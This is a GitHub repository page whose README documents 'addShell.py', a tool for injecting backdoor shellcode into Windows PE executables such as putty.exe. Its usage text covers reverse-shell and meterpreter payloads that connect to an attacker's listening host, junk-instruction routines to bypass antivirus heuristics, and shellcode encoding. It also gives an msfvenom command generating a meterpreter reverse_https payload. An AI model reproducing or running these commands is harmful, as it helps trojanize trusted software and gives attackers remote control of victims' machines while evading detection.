Simple tool to automate adding shellcode to PE files
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
README.md
addShell.py

README.md

My implementation of automatically adding a backdoor shell to a PE file.

Usage: usage python addShell.py [OPTIONS]
Example: python addShell.py -f ./putty.exe -H 192.168.1.10 -P 443 -p 3 

Options:
  -h, --help        show this help message and exit
  -f FILE           Specify input PE file to backdoor
  -o OUTPUT         Specify output location to save backdoored file.
                      Default=inputFile_evil.exe
  -H HOSTIP         Specify IP Address of listening Host for reverse connection, ex: 192.168.1.10
  -P PORT           Specify listening port number, ex: 4321
  -s SHELLCODE      Specify custom shellcode to use, NOTE: this feature in backdoor mode adds 310 bytes to shellcode size
                      NOTE: must be in "feedbeef" hex format, recommend using the following command to properly format shellcode:
                      msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=443 -f raw | xxd -p | tr -d " "
  -p PAYLOAD        Specify payload.  Default shell_reverse_tcp.  Valid values are:
                      0 - windows/shell_reverse_tcp
                      1 - windows/meterpreter/reverse_http
                      2 - windows/meterpreter/reverse_http +PrependMigrate
                      3 - windows/meterpreter/reverse_https
                      4 - windows/meterpreter/reverse_https +PrependMigrate
  -m MODE           Specify program mode.  Program was designed to backdoor executables, but if you really need to, you can disable normal program execution with the FRONTDOOR mode.
                      Valid values are (Default 0):
                      0 - BACKDOOR
                      1 - FRONTDOOR
  -t TARGETOS       Specify the target Operating System (used for preserving ESP).  Default Win7_64bit.  Valid values are:
                      0 - Win7_32bit
                      1 - Win7_64bit
                      2 - Win8.1_64bit
                      3 - Win10_64bit
  -d OFFSET         Specify the offset distance between shellcode and start of cave.  Recommend increasing this value if PE is crashing after shell. 
                      Default: 4
  -j NUM_JUNK       Specify the number of "Junk" Instructions to use in heuristic bypass routine.  
                      Default 30
  -J NUM_JUNK_ITER  Specify the number of times to iterate over all "Junk" Instructions used in heuristic bypass routine.
                      Default 20,000,000
  -e NUM_ENCODE     Specify number of random operations used to encode the shellcode. 
                      Default: 10, Max: 40